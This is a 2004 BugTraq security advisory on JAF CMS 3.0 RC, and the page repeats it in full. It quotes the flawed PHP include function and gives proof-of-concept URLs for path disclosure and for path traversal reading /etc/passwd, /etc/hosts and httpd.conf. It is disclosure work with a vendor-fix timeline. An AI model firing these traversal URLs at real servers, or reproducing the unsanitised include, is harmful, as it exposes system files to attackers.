BugTraq
Back to list
|
Post reply
Vulnerabilities in JAF CMS
Nov 09 2004 08:37AM
y3dips (at) www.securityfocus (dot) com [email concealed],[ echo|staff ]@securityfocus.com (at) www.securityfocus (dot) com [email concealed] (y3dips echo or id)
ECHO_ADV_08$2004
------------------------------------------------------------------------
---
Vulnerabilities in JAF CMS
------------------------------------------------------------------------
---
Author: y3dips
Date: November, 4th 2004
Location: Indonesia, Jakarta
Web: http://echo.or.id/adv/adv08-y3dips-2004.txt
------------------------------------------------------------------------
---
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
JAF CMS - ...just another flat file CMS, is a Content Management System (CMS)
consist of a powerful set of PHP scripts that allow you to maintain personal
home page. There is no need for a database. The pages stored in a simple flat
file. I've coded this script because I realize that its hard to found server
(especially free space) offering PHP with database support already.
Created by Salim "ph03y3nk"
Version affected : 3.0 Release Candidate , Not tested on 0ther Version
Mail Contact : ph03y3nk (at) users.sourceforge (dot) net [email concealed]
URL: http://jaf-cms.sourceforge.net/
------------------------------------------------------------------------
---
Vulnerabilities:
~~~~~~~~~~~~~~~~
A. Full path disclosure:
A remote user can access the file to cause the system to display an error
message that indicates the installation path. The resulting error message
will disclose potentially sensitive installation path information to the
remote attacker.
See the script in config.php
---snip---
function displaycontent() {
global $jaf;
if(file_exists("data/".$jaf['show'])) {
require_once ("data/".$jaf['show']);
$filemod = filemtime("data/".$jaf['show']);
$filemodtime = date("F j, Y", $filemod);
echo "This page last updated on : <strong>$filemodtime</strong>";
}
else {
if(file_exists("news/".$jaf['show'])) {
require_once ("news/".$jaf['show']);
}
else {
echo "<p align='center'><img src='images/403-error.gif'><br /><big>
<strong>Can't find the requested page, Sorry!!</strong></big></p>";
}
}
}
---snip---
in that files we can see that if we supply another name of page (which is not
in "data/" directory) , what we get is error message that define in the script
" Can't find the requested page, Sorry!! "
but what if we dont supply anything ? ,bummm ... weve got an error message that
display installation path.
POC :
http://localhost/jaf/index.php?show=
then we got an error
Warning: displaycontent(data/): failed to open stream: Success in
/var/www/html/jaf/config.php on line 129
Fatal error: displaycontent(): Failed opening required 'data/'
(include_path='.:/usr/share/pear') in /var/www/html/jaf/config.php on line 129
B. Path Traversal
Config.php files also vulnerable against basic path traversal attack which is
use "../" special character sequence to alter the resource location requested
in the URL. Consequently, the results can reveal source code because the file
is interpreted as text.
Exploit Code :
http://localhost/jaf/index.php?show=../../../../../../../etc/passwd
http://localhost/jaf/index.php?show=../../../../../../../etc/hosts
http://localhost/jaf/index.php?show=../../../../../../../etc/httpd/conf/
httpd.conf
------------------------------------------------------------------------
--
The fix:
~~~~~~~~
Vendor allready contacted and allready fix it, maybe the vendor will released
a new version .
------------------------- - -- --- -- - -
report to vendor 4-11-2004
vendor allready fix the bug 6-11-2004
advisories released to securityfocus.com 9-11-2004
------------------------------------------------------------------------
---
Disclamier:
~~~~~~~~~~~
Advice, directions, instructions and script on security vulnerabilities
in this advisory for educational purpose, y3dips nor echo.or.id does not
accept responsibility for any damage or injury caused as a result of its use
------------------------------------------------------------------------
---
Shoutz:
~~~~~~~
~ m0by, the_day, comex, z3r0byt3, K-159, c-a-s-e, S`to @T echo/staff
~ yudhax, biatch-x, lieur-euy
~ newbie_hacker (at) yahoogroups (dot) com [email concealed] ,
~ #e-c-h-o & #aikmel @DALNET
Greetz:
~~~~~~~
~ pho3y3nk , thx for "friendly" response. HOPE it would be a great CMS
------------------------------------------------------------------------
---
Contact:
~~~~~~~~
y3dips || echo|staff || y3dips(at)echo(dot)or(dot)id
Homepage: http://y3dips.echo.or.id/
-------------------------------- [ EOF ] ----------------------------------
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
ECHO_ADV_08$2004
------------------------------------------------------------------------
---
Vulnerabilities in JAF CMS
------------------------------------------------------------------------
---
Author: y3dips
Date: November, 4th 2004
Location: Indonesia, Jakarta
Web: http://echo.or.id/adv/adv08-y3dips-2004.txt
------------------------------------------------------------------------
---
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
JAF CMS - ...just another flat file CMS, is a Content Management System (CMS)
consist of a powerful set of PHP scripts that allow you to maintain personal
home page. There is no need for a database. The pages stored in a simple flat
file. I've coded this script because I realize that its hard to found server
(especially free space) offering PHP with database support already.
Created by Salim "ph03y3nk"
Version affected : 3.0 Release Candidate , Not tested on 0ther Version
Mail Contact : ph03y3nk (at) users.sourceforge (dot) net [email concealed]
URL: http://jaf-cms.sourceforge.net/
------------------------------------------------------------------------
---
Vulnerabilities:
~~~~~~~~~~~~~~~~
A. Full path disclosure:
A remote user can access the file to cause the system to display an error
message that indicates the installation path. The resulting error message
will disclose potentially sensitive installation path information to the
remote attacker.
See the script in config.php
---snip---
function displaycontent() {
global $jaf;
if(file_exists("data/".$jaf['show'])) {
require_once ("data/".$jaf['show']);
$filemod = filemtime("data/".$jaf['show']);
$filemodtime = date("F j, Y", $filemod);
echo "This page last updated on : <strong>$filemodtime</strong>";
}
else {
if(file_exists("news/".$jaf['show'])) {
require_once ("news/".$jaf['show']);
}
else {
echo "<p align='center'><img src='images/403-error.gif'><br /><big>
<strong>Can't find the requested page, Sorry!!</strong></big></p>";
}
}
}
---snip---
in that files we can see that if we supply another name of page (which is not
in "data/" directory) , what we get is error message that define in the script
" Can't find the requested page, Sorry!! "
but what if we dont supply anything ? ,bummm ... weve got an error message that
display installation path.
POC :
http://localhost/jaf/index.php?show=
then we got an error
Warning: displaycontent(data/): failed to open stream: Success in
/var/www/html/jaf/config.php on line 129
Fatal error: displaycontent(): Failed opening required 'data/'
(include_path='.:/usr/share/pear') in /var/www/html/jaf/config.php on line 129
B. Path Traversal
Config.php files also vulnerable against basic path traversal attack which is
use "../" special character sequence to alter the resource location requested
in the URL. Consequently, the results can reveal source code because the file
is interpreted as text.
Exploit Code :
http://localhost/jaf/index.php?show=../../../../../../../etc/passwd
http://localhost/jaf/index.php?show=../../../../../../../etc/hosts
http://localhost/jaf/index.php?show=../../../../../../../etc/httpd/conf/
httpd.conf
------------------------------------------------------------------------
--
The fix:
~~~~~~~~
Vendor allready contacted and allready fix it, maybe the vendor will released
a new version .
------------------------- - -- --- -- - -
report to vendor 4-11-2004
vendor allready fix the bug 6-11-2004
advisories released to securityfocus.com 9-11-2004
------------------------------------------------------------------------
---
Disclamier:
~~~~~~~~~~~
Advice, directions, instructions and script on security vulnerabilities
in this advisory for educational purpose, y3dips nor echo.or.id does not
accept responsibility for any damage or injury caused as a result of its use
------------------------------------------------------------------------
---
Shoutz:
~~~~~~~
~ m0by, the_day, comex, z3r0byt3, K-159, c-a-s-e, S`to @T echo/staff
~ yudhax, biatch-x, lieur-euy
~ newbie_hacker (at) yahoogroups (dot) com [email concealed] ,
~ #e-c-h-o & #aikmel @DALNET
Greetz:
~~~~~~~
~ pho3y3nk , thx for "friendly" response. HOPE it would be a great CMS
------------------------------------------------------------------------
---
Contact:
~~~~~~~~
y3dips || echo|staff || y3dips(at)echo(dot)or(dot)id
Homepage: http://y3dips.echo.or.id/
-------------------------------- [ EOF ] ----------------------------------
[ reply ]